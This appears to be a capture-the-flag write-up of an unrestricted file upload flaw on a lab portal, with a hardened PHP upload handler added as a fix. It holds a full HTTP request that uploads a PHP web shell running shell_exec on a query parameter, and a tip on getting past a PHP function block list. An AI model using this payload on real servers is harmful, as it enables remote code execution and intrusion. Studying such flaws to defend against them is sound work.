Unrestricted File Upload
As Paul, we have access to a file upload service that is supposed to accept only zip files.
From the source code, however, it is clear that there are no upload restrictions at all: neither the file type nor the file name is checked.
Moreover, we control the name under which the file is stored, via the task field. Using Burp Suite, we can send a PHP one-liner that gives remote code execution.
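The request below works only because the handler trusts the client for everything: the file's extension, its Content-Type, and (through the task field) the name it is stored under. As an added example, not the portal's own fileController.php, here is what a hardened version of such a handler looks like in PHP. It assumes the upload arrives in $_FILES['file'], that only ZIP archives are meant to be accepted, and that UPLOAD_DIR is a directory outside the web root; all three are assumptions, not details from the page.

```php
<?php
// Hypothetical hardened upload handler (added example, not the portal's code).
// Assumptions: upload is in $_FILES['file'], only ZIP archives are wanted,
// UPLOAD_DIR lives outside the document root so nothing in it is ever served
// or executed as PHP.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads';  // assumed location, outside the web root
const MAX_BYTES  = 10 * 1024 * 1024;    // assumed 10 MiB limit

/**
 * Validate an uploaded file and return the server-chosen path it was stored at.
 * Throws RuntimeException on any failure; the caller decides how to report it.
 */
function storeZipUpload(array $file): string
{
    // 1. PHP's own upload status must be clean.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // 2. Refuse anything that did not arrive as an HTTP POST upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // 3. Decide on the content, never on the client-supplied filename or
    //    Content-Type. A non-empty ZIP starts with the local-file-header
    //    signature "PK\x03\x04" (empty archives, "PK\x05\x06", are rejected on purpose).
    $fh    = fopen($file['tmp_name'], 'rb');
    $magic = $fh ? fread($fh, 4) : '';
    if ($fh) {
        fclose($fh);
    }
    if ($magic !== "PK\x03\x04") {
        throw new RuntimeException('not a ZIP archive');
    }
    // Let libmagic confirm the MIME type derived from the bytes as well.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ['application/zip', 'application/x-zip-compressed'], true)) {
        throw new RuntimeException('unexpected mime type: ' . $mime);
    }
    // 4. Never reuse a user-controlled name (the "task" field in the request
    //    above). Generate the stored name server-side with a fixed extension.
    $name = bin2hex(random_bytes(16)) . '.zip';
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    // Stored uploads are data: readable by the application, never executable.
    chmod($dest, 0640);
    return $dest;
}

// Minimal entry point; in the real portal this would sit behind authentication.
if (PHP_SAPI !== 'cli' && isset($_FILES['file'])) {
    header('Content-Type: application/json');
    try {
        $path = storeZipUpload($_FILES['file']);
        http_response_code(201);
        echo json_encode(['stored' => basename($path)]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

Two points the code cannot enforce on its own. First, the upload directory must not be reachable through the web server, or must be served with PHP execution switched off, so that even a mis-validated file is never interpreted. Second, the Notes below show why restricting individual functions in php.ini is a weak last line of defence: a disable_functions list that names system but not shell_exec, exec, passthru, popen and proc_open blocks nothing, since any one of them is enough to run a command.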
Upload malicious files
POST /portal/includes/fileController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 338
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="task"

nothing.php
------WebKitFormBoundaryHBZNum5szzVSddPn--
Notes
While I first tried to use the PHP system command, there seems to be an error when performing the upload. I suspect that system is not allowed by the PHP configuration. Changing to shell_exec solves the issue.